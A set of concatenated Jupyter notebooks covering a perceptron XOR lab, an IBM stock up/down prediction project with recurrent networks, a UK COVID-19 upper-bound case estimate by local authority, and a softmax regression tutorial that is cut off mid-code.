activations = np.where(activations>0,1,0)
# update the weights
weights -= eta*np.dot(np.transpose(inputs),activations-targets)
# now let's classify the inputs samples
outputs = np.dot(inputs,weights)
outputs = np.where(outputs>0,1,0)
outputs
# TODO: compute the accuracy
num_correct = np.sum(outputs == targets) # number of correct classifications
accuracy = float(num_correct) / nData # accuracy
accuracy
# TODO: compute the Confusion matrix
nClasses = 2 # here we have two classes only
cm = np.zeros((nClasses,nClasses))
for i in range(nClasses):
for j in range(nClasses):
cm[i,j] = np.sum(np.where(outputs==i,1,0)*np.where(targets==j,1,0))
# TDOD: can you test the implementation on the XOR logic function?
b = np.array([[0,0,0],[0,1,1],[1,0,1],[1,1,0]]) # XOR logic table
b
# Will we get 100% accuracies? if no, why?
inputs = b[:,:2]
targets = b[:,2:]
nIn = np.shape(inputs)[1]
nOut = np.shape(targets)[1]
weights = np.random.rand(nIn+1,nOut)*0.1-0.05
nData = np.shape(inputs)[0] # number of samples
inputs = np.concatenate((inputs,-np.ones((nData,1))),axis=1)
eta = 0.25 # the learning rate
nIterations = 10
for n in range(nIterations):
# Compute activations
activations = np.dot(inputs, weights)
# Threshold the activations
activations = np.where(activations>0,1,0)
# update the weights
weights -= eta*np.dot(np.transpose(inputs),activations-targets)
outputs = np.dot(inputs,weights)
outputs = np.where(outputs>0,1,0)
num_correct = np.sum(outputs == targets) # number of correct classifications
accuracy = float(num_correct) / nData # accuracy
accuracy
# the answer is that we cannot get 100% accurcies because
# the problem cannot be solved by one straight line (single layer
# perceptron gives a straight line soltuion)
# we will see how to solve it next week lab
```
| github_jupyter |
# Deep Learning on IBM Stocks
## The Data
We choose to analyse IBM history stock data which include about 13K records from the last 54 years. [From the year 1962 to this day]
Each record contains:
- Open price: The price at which the stock opened on that day.
- Close price: The price at which the stock closed on that day.
- High price: The max price the stock reached within the day.
- Low price: The min price the stock reached within the day.
- Volume: The number of shares traded within the day.
- [Adjacent close price](https://marubozu.blogspot.co.il/2006/09/how-yahoo-calculates-adjusted-closing.html).
- Date: Day, Month and Year.
The main challenges of this project are:
- The limited data within a market that is changed by wide variety of things. In particular, things that we don't see in the raw data, like special accouncments on new technology.
- The historic data of stocks in a particular situation doesn't necessarily resolve the same outcome in the exact same situation a few years later.
- We wondered whether it is possible to actually find some features that will give us better accuracy than random.
This project is interesting because as everybody knows deep learning solved tasks that considered difficult even with pretty basic deep learning features.
And of course, If we find something useful when it comes to stock then good prediction = profit.
```
from pandas_datareader.data import DataReader
from datetime import datetime
import os
import pandas as pd
import random
import numpy as np
from keras.models import Sequential
from keras.layers.recurrent import LSTM,GRU,SimpleRNN
from keras.layers.core import Dense, Activation, Dropout
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import RandomForestClassifier
import warnings
warnings.filterwarnings('ignore')
from keras.utils.np_utils import to_categorical
```
#### Load or Download the data
```
# Return the IBM daily price history as a DataFrame: read the cached CSV at
# ./data/ibm.csv if present, otherwise download the full history from Yahoo
# via pandas_datareader and cache it first.  force=True always re-downloads.
def get_data_if_not_exists(force=False):
if os.path.exists("./data/ibm.csv") and not force:
return pd.read_csv("./data/ibm.csv")
else:
if not os.path.exists("./data"):
os.mkdir("data")
ibm_data = DataReader('IBM', 'yahoo', datetime(1950, 1, 1), datetime.today())
pd.DataFrame(ibm_data).to_csv("./data/ibm.csv")
# NOTE(review): only this branch calls reset_index(); the cached branch
# returns whatever read_csv produced — confirm callers tolerate both shapes.
return pd.DataFrame(ibm_data).reset_index()
```
## Data Exploration
```
print "loading the data"
data = get_data_if_not_exists(force=True)
print "done loading the data"
print "data columns names: %s"%data.columns.values
print data.shape
data.head()
```
#### Data exploration highlights:
- The data contains 13,733 records.
- Each record reprsent one specific day.
- Each record contain: Date, Open, High, Low, Close, Volume and Adj Close.
# Creating sequence of close price from the stock data
Our motivation was trying to imitate a stock similar to the IBM stock.
### Feature extraction:
We'll use only the closing price of the stock as our feature.
The generated sequence will include only the closing price as well.
```
# Feature = the Close price only (index 4 of the record matrix:
# Date, Open, High, Low, Close, Volume, Adj Close).
def extract_features(items):
return [[item[4]] for item in items]
# Target = the Close price of the day following the window.
def extract_expected_result(item):
return [item[4]]
# Number of consecutive days fed to the model per sample.
MAX_WINDOW = 5
# NOTE(review): this redefines train_test_split, shadowing sklearn's
# function imported at the top of the notebook; any later cell expecting
# sklearn's argument order/return order will misbehave — confirm.
def train_test_split(data, test_size=0.1):
"""
This just splits data to training and testing parts
"""
ntrn = int(round(len(data) * (1 - test_size)))
X, y = generate_input_and_outputs(data,extract_features,extract_expected_result)
X_train,y_train,X_test, y_test = X[:ntrn],y[:ntrn],X[ntrn:],y[ntrn:]
return X_train, y_train, X_test, y_test
# Slide a MAX_WINDOW-day window over the frame; each window is one input,
# the day after the window is its expected output.
def generate_input_and_outputs(data,extractFeaturesFunc=extract_features,expectedResultFunc=extract_expected_result):
step = 1
inputs = []
outputs = []
for i in range(0, len(data) - MAX_WINDOW, step):
# NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0;
# use .values / .to_numpy() on modern pandas.
inputs.append(extractFeaturesFunc(data.iloc[i:i + MAX_WINDOW].as_matrix()))
outputs.append(expectedResultFunc(data.iloc[i + MAX_WINDOW].as_matrix()))
return inputs, outputs
X_train,y_train, X_test, y_test = train_test_split(data,test_size=0.15)
```
### Distance metrics:
For our evaluation of the quality we used several distance metrics:
* Euclidean distance.
* Squared Euclidean distance.
* Chebyshev distance.
* Cosine distance.
```
import scipy.spatial.distance as dist
# Print several distance metrics between the generated sequence and the
# ground-truth test sequence (module-global y_test).  Python 2 print syntax.
def distance_functions(generated_seq):
generated_sequence = np.asarray(generated_seq)
original_sequence = np.asarray(y_test)
print 'Euclidean distance: ', dist.euclidean(original_sequence, generated_sequence)
print 'Squared Euclidean distance: ', dist.sqeuclidean(original_sequence, generated_sequence)
print 'Chebyshev distance: ', dist.chebyshev(original_sequence, generated_sequence)
print 'Cosine distance: ', dist.cosine(original_sequence, generated_sequence)
return generated_sequence
# Fit the model on the module-global training split, predict on X_test and
# report distances.  NOTE(review): model_name is unused — kept for interface
# compatibility with existing call sites.
def train_and_evaluate(model, model_name):
print 'Done building'
print 'Training...'
model.fit(X_train, y_train, batch_size=500, nb_epoch=500, validation_split=0.15,verbose=0)
print 'Generating sequence...'
generated_sequence = model.predict(X_test)
return distance_functions(generated_sequence)
```
### Training and Evaluation
We tried 3 different deep-learning algorithms:
* LSTM.
* GRU.
* SimpleRNN.
For each algorithm we generated a sequence, Measured its distance and plotted the given result with the original sequence.
```
layer_output_size1 = 128
print 'Building LSTM Model'
model = Sequential()
model.add(LSTM(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
LSTM_seq = train_and_evaluate(model, 'LSTM')
print '----------------------'
print 'Building SimpleRNN Model'
model = Sequential()
model.add(SimpleRNN(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
SimpleRNN_seq = train_and_evaluate(model, 'SimpleRNN')
print '----------------------'
print 'Building GRU Model'
model = Sequential()
model.add(GRU(layer_output_size1, return_sequences=False, input_shape=(MAX_WINDOW, len(X_train[0][0]))))
model.add(Dense(len(y_train[0]), input_dim=layer_output_size1))
model.add(Activation("linear"))
model.compile(loss="mean_squared_error", optimizer="rmsprop")
GRU_seq = train_and_evaluate(model, 'GRU')
```
### Graphs showing the difference between the generated sequence and the original
#### LSTM Sequence vs Original Sequence.
```
%matplotlib inline
import matplotlib.pyplot as plt
import pylab
pylab.rcParams['figure.figsize'] = (32, 6)
pylab.xlim([0,len(y_test)])
plt.plot(y_test, linewidth=1)
plt.plot(LSTM_seq, marker='o', markersize=4, linewidth=0)
plt.legend(['Original = Blue', 'LSTM = Green '], loc='best', prop={'size':20})
plt.show()
```
#### GRU Sequence vs Original Sequence
```
plt.plot(y_test, linewidth=1)
plt.plot(GRU_seq, marker='o', markersize=4, linewidth=0, c='r')
plt.legend(['Original = Blue','GRU = Red'], loc='best', prop={'size':20})
plt.show()
```
#### SimpleRNN Sequence vs Original Sequence.
```
plt.plot(y_test, linewidth=1)
plt.plot(SimpleRNN_seq, marker='o', markersize=4, linewidth=0, c='black')
plt.legend(['Original = Blue', 'SimpleRNN = Black'], loc='best', prop={'size':20})
plt.show()
```
# Up / Down sequences.
After the generation of a new sequence we wanted to try another thing: Trying to predict up / down sequences.
## Feature Extraction and Data Pre-processing.
#### The features are:
1. Open price within the day.
1. Highest price within the day.
1. Lowest price within the day.
1. Close price within the day.
1. Adj Close.
1. Raise percentage.
1. Spread.
1. Up Spread.
1. Down Spread.
1. Absolute Difference between Close and Previous day close.
1. Absolute Difference between Open and Previous day open.
1. Absolute Difference between High and Previous day high.
1. Absolute Difference between low and Previous day low.
1. For each day we've also added a 7 previous day sliding window containing all of the above.
1. 1 When the stock price raised for that day, 0 When the stock price didn't raise.
```
data = get_data_if_not_exists(force=True)
for i in range(1,len(data)):
prev = data.iloc[i-1]
data.set_value(i,"prev_close",prev["Close"])
data["up/down"] = (data["Close"] - data["prev_close"]) > 0
data["raise_percentage"] = (data["Close"] - data["prev_close"])/data["prev_close"]
data["spread"] = abs(data["High"]-data["Low"])
data["up_spread"] = abs(data["High"]-data["Open"])
data["down_spread"] = abs(data["Open"]-data["Low"])
# import re
for i in range(1,len(data)):
prev = data.iloc[i-1]
data.set_value(i,"prev_open",prev["Open"])
data.set_value(i,"prev_high",prev["High"])
data.set_value(i,"prev_low",prev["Low"])
# data.set_value(i,"month",re.findall("[1-9]+", str(data.Date[i]))[2])
# data.set_value(i,"year",re.findall("[1-9]+", str(data.Date[i]))[0])
# prev = data.iloc[i-2]
# data.set_value(i,"prev_prev_open",prev["Open"])
# data.set_value(i,"prev_prev_high",prev["High"])
# data.set_value(i,"prev_prev_low",prev["Low"])
# data.set_value(i,"prev_prev_close",prev["Close"])
data["close_diff"] = abs(data["Close"] - data["prev_close"])
# data["close_diff"] = data["Close"] - data["prev_close"]
# data["close_diff"] = abs(data["Close"] / data["prev_close"])
data["open_diff"] = abs(data["Open"] - data["prev_open"])
# data["open_diff"] = data["Open"] - data["prev_open"]
# data["open_diff"] = abs(data["Open"] / data["prev_open"])
data["high_diff"] = abs(data["High"] - data["prev_high"])
# data["high_diff"] = data["High"] - data["prev_high"]
# data["high_diff"] = abs(data["High"] / data["prev_high"])
data["low_diff"] = abs(data["Low"] - data["prev_low"])
# data["low_diff"] = data["Low"] - data["prev_low"]
# data["low_diff"] = abs(data["Low"] / data["prev_low"])
# data["prev_prev_close_diff"] = (data["Close"] - data["prev_prev_close"])
# data["prev_prev_raise_percentage"] = (data["Close"] - data["prev_prev_close"])/data["prev_prev_close"]
# data["prev_prev_open_diff"] = (data["Open"] - data["prev_prev_open"])
# data["prev_prev_high_diff"] = (data["High"] - data["prev_prev_high"])
# data["prev_prev_low_diff"] = (data["Low"] - data["prev_prev_low"])
# data["open_close_mean"] = (data["Open"] + data["Close"])/2
# removing the first record because have no previuse record therefore can't know if up or down
data = data[1:]
data.describe()
# Days per sliding window fed to the model.
MAX_WINDOW = 5
# Column indices refer to the engineered frame built above:
# 1-6 = Open, High, Low, Close, Volume, Adj Close; 8 = up/down flag;
# 9-12 = raise_percentage, spread, up_spread, down_spread;
# 16-19 = close/open/high/low diffs vs the previous day.
# The trailing 1/0 re-encodes the boolean up/down flag (item[8]).
def extract_features(items):
return [[item[1], item[2], item[3], item[4],
item[5], item[6], item[9], item[10],
item[11], item[12], item[16], item[17],
item[18], item[19], 1]
if item[8]
else
[item[1], item[2], item[3], item[4],
item[5], item[6], item[9], item[10],
item[11], item[12], item[16], item[17],
item[18], item[19], 0]
for item in items]
# Label = 1 if the stock went up that day, else 0.
def extract_expected_result(item):
return 1 if item[8] else 0
# Slide a MAX_WINDOW-day window over the frame; input = the window's
# feature rows, output = the up/down label of the following day.
def generate_input_and_outputs(data):
step = 1
inputs = []
outputs = []
for i in range(0, len(data) - MAX_WINDOW, step):
inputs.append(extract_features(data.iloc[i:i + MAX_WINDOW].as_matrix()))
outputs.append(extract_expected_result(data.iloc[i + MAX_WINDOW].as_matrix()))
return inputs, outputs
print "generating model input and outputs"
X, y = generate_input_and_outputs(data)
print "done generating input and outputs"
y = to_categorical(y)
```
### Splitting the data to train and test
```
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15)
X_train,X_validation,y_train,y_validation = train_test_split(X_train,y_train,test_size=0.15)
```
## Configuration of the deep learning models
```
models = []
layer_output_size1 = 128
layer_output_size2 = 128
output_classes = len(y[0])
percentage_of_neurons_to_ignore = 0.2
model = Sequential()
model.add(LSTM(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(LSTM(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "LSTM"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
model = Sequential()
model.add(SimpleRNN(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(SimpleRNN(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "SimpleRNN"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
model = Sequential()
model.add(GRU(layer_output_size1, return_sequences=True, input_shape=(MAX_WINDOW, len(X[0][0]))))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(GRU(layer_output_size2, return_sequences=False))
model.add(Dropout(percentage_of_neurons_to_ignore))
model.add(Dense(output_classes))
model.add(Activation('softmax'))
model.alg_name = "GRU"
model.compile(loss='categorical_crossentropy',metrics=['accuracy'], optimizer='rmsprop')
models.append(model)
```
### Training
```
# Fit one Keras model on the module-global train/validation split.
# Python 2 print syntax; nb_epoch is the Keras-1 spelling of epochs.
def trainModel(model):
epochs = 5
print "Training model %s"%(model.alg_name)
model.fit(X_train, y_train, batch_size=128, nb_epoch=epochs,validation_data=(X_validation,y_validation), verbose=0)
```
### Evaluation
```
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.tree import DecisionTreeClassifier
# Train a DecisionTreeClassifier on the network's validation-set outputs,
# acting as a learned thresholding layer on top of the softmax probabilities.
# The commented-out lines are the other classifiers that were tried.
def createSplit(model):
print 'Adding layer of DecisionTreeClassifier'
# split_model = RandomForestClassifier()
# split_model.fit(model.predict(X_validation), y_validation)
# split_model = ExtraTreesClassifier(n_estimators=15, max_depth=None, min_samples_split=2, random_state=0)
# split_model.fit(model.predict(X_validation), y_validation)
# split_model = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
# split_model.fit(model.predict(X_validation), y_validation)
split_model = DecisionTreeClassifier()
split_model.fit(model.predict(X_validation), y_validation)
return split_model
def probabilities_to_prediction(record):
    """Turn a two-element probability pair into a one-hot list.

    Returns [1, 0] when the first entry strictly dominates, otherwise
    [0, 1] (ties resolve to [0, 1]).
    """
    first_wins = record[0] > record[1]
    return [1, 0] if first_wins else [0, 1]
# Evaluate one model on the module-global test split, comparing two decision
# rules: the DecisionTree layer from createSplit() vs a simple argmax over
# the two softmax outputs.  Returns the tree-based accuracy.
def evaluateModel(model):
success, success2 = 0,0
predicts = model.predict(X_test)
split_model = createSplit(model)
for index, record in enumerate(predicts):
# predicted: DecisionTree decision; predicted2: raw argmax decision
predicted = list(split_model.predict([np.array(record)])[0])
predicted2 = probabilities_to_prediction(record)
expected = y_test[index]
if predicted[0] == expected[0]:
success += 1
if predicted2[0] == expected[0]:
success2 += 1
accuracy = float(success) / len(predicts)
accuracy2 = float(success2) / len(predicts)
# NOTE(review): reporting max(acc, 1-acc, ...) assumes predictions could be
# inverted post-hoc; this inflates the printed accuracy vs the returned one.
print "The Accuracy for %s is: %s" % (model.alg_name, max(accuracy2, accuracy, 1-accuracy, 1-accuracy2))
return accuracy
def train_and_evaluate():
    """Train and evaluate every model in the module-level `models` list.

    Returns:
        dict mapping each model's alg_name to a list of accuracies (a list so
        repeated runs of the same algorithm accumulate their scores).
    """
    accuracies = {}
    for model in models:
        trainModel(model)
        acc = evaluateModel(model)
        # setdefault replaces the explicit membership test + empty-list init.
        accuracies.setdefault(model.alg_name, []).append(acc)
    return accuracies
acc = train_and_evaluate()
```
### Naive algorithm:
We'll choose the most frequent up / down of the stock.
```
# Naive baseline: always predict the most frequent up/down label.
# Its frequency divided by the total row count is the baseline accuracy
# the models above must beat.
all_data = data["up/down"].count()
most_frequent = data["up/down"].describe().top
frequency = data["up/down"].describe().freq
acc = float(frequency) / all_data
# print() calls replace the Python 2-only print statements.
print('The most frequent is: %s' % (most_frequent))
print('The accuracy of naive algorithm is: ', acc)
```
## Summary & Evaluation analysis:
#### Evaluation process:
Our evaluation used two different configurations:
1. Raw Deep-Learning algorithm.
1. Deep-Learning algorithm With added layer of DecisionTreeClassifier.
In both cases we used the predictions of the algorithm to create a sequence to tell us whether the stock is going to get up or down. Then we checked it with the actual data and calculated accuracy.
### Results:
The accuracy stated above is better than that of the naive algorithm — not by far, but still better — which means that if we follow the algorithm we can actually expect to make a profit.
### What next?
As expected, it seems that raw stock data alone does not yield a good estimate of the stock's behavior.
We could try mixing it with information from financial articles and news, try to take into account related stocks like the sector, S&P500 and new features, even checking for a country specific economics laws.
| github_jupyter |
# Upper bound estimate cases by region (Local Authority)
This is a back-of-the envelope calculation - taking ratios from the Imperial College report and applying them directly to regional demographics in the UK.
Assumes uniform infection ratio, no time dimension included here.
Ratios taken from table 1 in Imperial COVID-19 response team Report 9: 'Impact of non-pharmaceutical interventions (NPIs) to reduce COVID-19 mortality and healthcare demand'
Age demographic estimates taken from ONS mid-year estimates for 2018
```
import math
import os
import geopandas
import pandas
import tabula
# Clinical Commissioning Groups (April 2019) Boundaries EN BGC
# not used - more useful?
# ccg_boundaries_url = "https://opendata.arcgis.com/datasets/8fe2071ebdc2449eac5043fa244cb2b3_0.zip?outSR=%7B%22latestWkid%22%3A3857%2C%22wkid%22%3A102100%7D"
# Lower Layer Super Output Area (2011) to Clinical Commissioning Group to Local Authority District (April 2019) Lookup in England
# lookup for use with other geographies
# ccg_lad_lu_url = "https://opendata.arcgis.com/datasets/3f891ff7933f464dbf3c8095fc3b2547_0.csv"
# Local Authority Districts (December 2019) Boundaries UK BGC
lad_boundaries_url = "https://opendata.arcgis.com/datasets/0e07a8196454415eab18c40a54dfbbef_0.zip?outSR=%7B%22latestWkid%22%3A27700%2C%22wkid%22%3A27700%7D"
# Jupyter shell magics: download and unpack the LAD boundary shapefile.
!`wget {lad_boundaries_url} -O lad_boundaries19.zip`
!unzip lad_boundaries19.zip
# Load the generalised (BGC) boundaries: one row per local authority district.
lads = geopandas.read_file('Local_Authority_Districts_December_2019_Boundaries_UK_BGC.shp')
lads
# Critical care capacity
# consider? https://www.england.nhs.uk/statistics/statistical-work-areas/critical-care-capacity/
# Imperial COVID-19 response team Report 9: Impact of non-pharmaceutical interventions (NPIs) to reduce COVID-19 mortality and healthcare demand
report_url = "https://www.imperial.ac.uk/media/imperial-college/medicine/sph/ide/gida-fellowships/Imperial-College-COVID19-NPI-modelling-16-03-2020.pdf"
# Extract Table 1 (page 5): per-age-band severity ratios.
df = tabula.read_pdf(report_url, pages=5)[0]
df
ratios = df.dropna().reset_index(drop=True)
ratios.columns = ['age_group', 'symptomatic_ratio', 'hospitalised_ratio', 'infection_fatality_ratio']
# Ten-year age bands: 0-9, 10-19, ..., 80+.
ratios['age_min'] = range(0, 90, 10)
ratios['age_max'] = range(9, 99, 10)
# Convert "x%" strings into fractional floats for all three ratio columns
# (replaces three copy-pasted apply() lines with a single loop).
for pct_col in ['symptomatic_ratio', 'hospitalised_ratio', 'infection_fatality_ratio']:
    ratios[pct_col] = ratios[pct_col].apply(lambda d: float(d.replace("%", "")) / 100)
# The top band is open-ended (80+), so give it an effectively unbounded max.
ratios.loc[ratios.age_min == 80, 'age_max'] = 999
ratios
# Estimates of the population for the UK, England and Wales, Scotland and Northern Ireland
# Mid-2018: 2019 LA boundaries
mye_url = "https://www.ons.gov.uk/file?uri=%2fpeoplepopulationandcommunity%2fpopulationandmigration%2fpopulationestimates%2fdatasets%2fpopulationestimatesforukenglandandwalesscotlandandnorthernireland%2fmid20182019laboundaries/ukmidyearestimates20182019ladcodes.xls"
# Jupyter shell magic: download the ONS mid-year estimates workbook.
!`wget {mye_url} -O 'ukmidyearestimates20182019ladcodes.xls'`
# Sheet MYE2-All: one row per geography, one column per single year of age.
pop = pandas.read_excel('ukmidyearestimates20182019ladcodes.xls', sheet_name='MYE2-All', header=4) \
.dropna()
pop.head()
pop.Geography1.unique()
# Keep only local-authority-level rows (drop aggregate geographies).
ladpop = pop[~pop.Geography1.isin(['Country', 'Region', 'County', 'Metropolitan County'])] \
.drop(columns=['Geography1', 'All ages'])
ladpop
# check sets of LAD codes match
# (symmetric difference is empty iff the boundary file and the population
# file use the same set of 2019 LAD codes)
set(ladpop.Code.unique()) ^ set(lads.lad19cd)
# Long format: one row per (LAD, single year of age).
ladpopa = ladpop.melt(id_vars=['Code', 'Name'], var_name='age', value_name='population')
# Map each single year of age to a ten-year band index 0..8 (8 = 80+).
# NOTE(review): assumes the melted `age` values are numeric — confirm the
# source column headers are ints, otherwise d/10 will fail.
ladpopa['group'] = ladpopa.age.apply(lambda d: min(math.floor(d/10), 8))
ladpopa
# Aggregate to per-(LAD, band) populations and rename to match the
# boundary/ratio tables.
ladpopg = ladpopa.drop(columns=['Name', 'age']) \
.groupby(['Code', 'group']) \
.sum() \
.reset_index() \
.rename(columns={
'Code': 'lad19cd',
'group': 'age_min'
})
# Turn the band index back into the band's minimum age (0, 10, ..., 80).
ladpopg.age_min *= 10
ladpopg.population = ladpopg.population.round().astype(int)
ladpopg
```
## Core calculations here
cases = ratio * population * assumed infection ratio
Don't take this as a projection - no accounting for time or spread or any measures being put in place.
```
# Assume the entire population is infected: these are upper-bound numbers,
# not projections (no time dimension, no mitigation).
assumed_infection_ratio = 1.0
ladpopr = ladpopg.merge(ratios, on='age_min')
ladpopr['symptomatic_cases'] = (ladpopr.symptomatic_ratio * ladpopr.population * assumed_infection_ratio).round()
# The extra symptomatic_ratio factor treats hospitalised_ratio as a fraction
# of *symptomatic* cases — presumably matching the report's table; confirm.
ladpopr['hospitalised_cases'] = (ladpopr.hospitalised_ratio * ladpopr.symptomatic_ratio * ladpopr.population * assumed_infection_ratio).round()
# The infection fatality ratio is applied to the whole (assumed infected) population.
ladpopr['infection_fatalities'] = (ladpopr.infection_fatality_ratio * ladpopr.population * assumed_infection_ratio).round()
# Drop the input ratio columns, keeping only the derived case counts.
ladpopr = ladpopr.drop(columns=['age_group', 'age_max', 'symptomatic_ratio', 'hospitalised_ratio', 'infection_fatality_ratio'])
ladpopr
# All-ages totals per LAD.
lad_summary = ladpopr.drop(columns=['age_min']) \
.groupby('lad19cd') \
.sum() \
.reset_index()
lad_summary
# Wide format: one column per (variable, age band), e.g. symptomatic_cases_20.
lad_all = ladpopr.pivot(index='lad19cd', columns='age_min')
lad_all.columns = [f"{var}_{age}" for var, age in lad_all.columns]
# Append the all-ages totals alongside the per-band columns.
lad_all = lad_all.reset_index() \
.merge(lad_summary, on='lad19cd')
# Attach geometry so the result can be written as a spatial layer.
lad_all = lads[['lad19cd', 'lad19nm', 'geometry']].merge(lad_all, on='lad19cd')
lad_all
lad_all.to_file('spatial_exposure.gpkg', driver='GPKG')
```
| github_jupyter |
## Softmax regression in plain Python
Softmax regression, also called multinomial logistic regression, extends [logistic regression](logistic_regression.ipynb) to multiple classes.
**Given:**
- dataset $\{(\boldsymbol{x}^{(1)}, y^{(1)}), ..., (\boldsymbol{x}^{(m)}, y^{(m)})\}$
- with $\boldsymbol{x}^{(i)}$ being a $d-$dimensional vector $\boldsymbol{x}^{(i)} = (x^{(i)}_1, ..., x^{(i)}_d)$
- $y^{(i)}$ being the target variable for $\boldsymbol{x}^{(i)}$, for example with $K = 3$ classes we might have $y^{(i)} \in \{0, 1, 2\}$
A softmax regression model has the following features:
- a separate real-valued weight vector $\boldsymbol{w}= (w^{(1)}, ..., w^{(d)})$ for each class. The weight vectors are typically stored as rows in a weight matrix.
- a separate real-valued bias $b$ for each class
- the softmax function as an activation function
- the cross-entropy loss function
The training procedure of a softmax regression model has different steps. In the beginning (step 0) the model parameters are initialized. The other steps (see below) are repeated for a specified number of training iterations or until the parameters have converged.
An illustration of the whole procedure is given below.

* * *
**Step 0:** Initialize the weight matrix and bias values with zeros (or small random values).
* * *
**Step 1:** For each class $k$, compute a linear combination of the input features and the weight vector of class $k$, that is, for each training example compute a score for each class. For class $k$ and input vector $\boldsymbol{x}^{(i)}$ we have:
$score_{k}(\boldsymbol{x}^{(i)}) = \boldsymbol{w}_{k}^T \cdot \boldsymbol{x}^{(i)} + b_{k}$
where $\cdot$ is the dot product and $\boldsymbol{w}_{(k)}$ the weight vector of class $k$.
We can compute the scores for all classes and training examples in parallel, using vectorization and broadcasting:
$\boldsymbol{scores} = \boldsymbol{X} \cdot \boldsymbol{W}^T + \boldsymbol{b} $
where $\boldsymbol{X}$ is a matrix of shape $(n_{samples}, n_{features})$ that holds all training examples, and $\boldsymbol{W}$ is a matrix of shape $(n_{classes}, n_{features})$ that holds the weight vector for each class.
* * *
**Step 2:** Apply the softmax activation function to transform the scores into probabilities. The probability that an input vector $\boldsymbol{x}^{(i)}$ belongs to class $k$ is given by
$\hat{p}_k(\boldsymbol{x}^{(i)}) = \frac{\exp(score_{k}(\boldsymbol{x}^{(i)}))}{\sum_{j=1}^{K} \exp(score_{j}(\boldsymbol{x}^{(i)}))}$
Again we can perform this step for all classes and training examples at once using vectorization. The class predicted by the model for $\boldsymbol{x}^{(i)}$ is then simply the class with the highest probability.
* * *
**Step 3:** Compute the cost over the whole training set. We want our model to predict a high probability for the target class and a low probability for the other classes. This can be achieved using the cross entropy loss function:
$J(\boldsymbol{W},b) = - \frac{1}{m} \sum_{i=1}^m \sum_{k=1}^{K} \Big[ y_k^{(i)} \log(\hat{p}_k^{(i)})\Big]$
In this formula, the target labels are *one-hot encoded*. So $y_k^{(i)}$ is $1$ if the target class for $\boldsymbol{x}^{(i)}$ is $k$, otherwise $y_k^{(i)}$ is $0$.
Note: when there are only two classes, this cost function is equivalent to the cost function of [logistic regression](logistic_regression.ipynb).
* * *
**Step 4:** Compute the gradient of the cost function with respect to each weight vector and bias. A detailed explanation of this derivation can be found [here](http://ufldl.stanford.edu/tutorial/supervised/SoftmaxRegression/).
The general formula for class $k$ is given by:
$ \nabla_{\boldsymbol{w}_k} J(\boldsymbol{W}, b) = \frac{1}{m}\sum_{i=1}^m\boldsymbol{x}^{(i)} \left[\hat{p}_k^{(i)}-y_k^{(i)}\right]$
For the biases, the inputs $\boldsymbol{x}^{(i)}$ will be given 1.
* * *
**Step 5:** Update the weights and biases for each class $k$:
$\boldsymbol{w}_k = \boldsymbol{w}_k - \eta \, \nabla_{\boldsymbol{w}_k} J$
$b_k = b_k - \eta \, \nabla_{b_k} J$
where $\eta$ is the learning rate.
```
from sklearn.datasets import load_iris
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
np.random.seed(13)
```
## Dataset
```
# Synthetic dataset: four Gaussian blobs, 5000 points, for the 4-class demo.
X, y_true = make_blobs(centers=4, n_samples = 5000)
fig = plt.figure(figsize=(8,6))
plt.scatter(X[:,0], X[:,1], c=y_true)
plt.title("Dataset")
plt.xlabel("First feature")
plt.ylabel("Second feature")
plt.show()
# reshape targets to get column vector with shape (n_samples, 1)
y_true = y_true[:, np.newaxis]
# Split the data into a training and test set
X_train, X_test, y_train, y_test = train_test_split(X, y_true)
print(f'Shape X_train: {X_train.shape}')
print(f'Shape y_train: {y_train.shape}')
print(f'Shape X_test: {X_test.shape}')
print(f'Shape y_test: {y_test.shape}')
```
## Softmax regression class
```
class SoftmaxRegressor:
    """Multinomial logistic (softmax) regression trained by batch gradient descent.

    Weights are stored as a (n_classes, n_features) matrix with one row per
    class; biases as a (1, n_classes) row vector.
    """

    def __init__(self):
        pass

    def train(self, X, y_true, n_classes, n_iters=10, learning_rate=0.1):
        """Fit the model on (X, y_true) with full-batch gradient descent.

        Args:
            X: numpy array of shape (n_samples, n_features)
            y_true: integer class labels, shape (n_samples, 1)
            n_classes: number of distinct classes
            n_iters: number of gradient steps
            learning_rate: step size

        Returns:
            (weights, bias, all_losses) where all_losses holds the
            cross-entropy loss at every iteration.
        """
        self.n_samples, n_features = X.shape
        self.n_classes = n_classes
        self.weights = np.random.rand(self.n_classes, n_features)
        self.bias = np.zeros((1, self.n_classes))
        all_losses = []
        for i in range(n_iters):
            scores = self.compute_scores(X)
            probs = self.softmax(scores)
            y_one_hot = self.one_hot(y_true)
            loss = self.cross_entropy(y_one_hot, probs)
            all_losses.append(loss)
            # Gradient of cross-entropy w.r.t. the scores is (probs - y_one_hot);
            # the chain rule through the linear layer gives dw and db.
            # (The unused per-iteration argmax prediction was removed.)
            dw = (1 / self.n_samples) * np.dot(X.T, (probs - y_one_hot))
            db = (1 / self.n_samples) * np.sum(probs - y_one_hot, axis=0)
            self.weights = self.weights - learning_rate * dw.T
